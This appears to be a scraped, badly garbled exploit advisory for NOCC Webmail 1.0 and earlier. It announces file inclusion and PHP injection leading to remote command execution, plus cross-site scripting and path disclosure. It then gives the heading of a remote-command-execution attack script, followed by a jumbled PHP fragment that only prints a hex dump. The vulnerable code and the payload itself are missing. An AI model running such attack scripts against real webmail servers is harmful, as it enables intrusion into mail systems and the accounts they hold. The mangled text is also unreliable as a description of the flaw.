------ NOCC Webmail <= 1.0 multiple arbitrary local inclusion + ---------------- php injection -> remote code execution / / cross site scripting / path disclosure -------------------------------------------------------------------------------- software: site: http://nocc.sourceforge.net/ description: "NOCC is a webmail client written in PHP. It provides webmail access to IMAP and POP3 accounts." -------------------------------------------------------------------------------- i) vulnerable code in html/footer.php at lines 2-11: ...
**** NOCC Webmail <= 1.0 remote commands execution ****
a script by rgod at http://retrogod.altervista.org
"; for ($li=0; $li<=15; $li++) { echo " | ".htmlentities($headeri[$li+$ki])." | "; } $ki=$ki+16; echo "||
0".htmlentities($dAtAi)." | "; } else { echo "".htmlentities($dAtAi)." | "; } $ii++;$ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "   | "; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "".htmlentities($headeri[$li])." | "; } echo "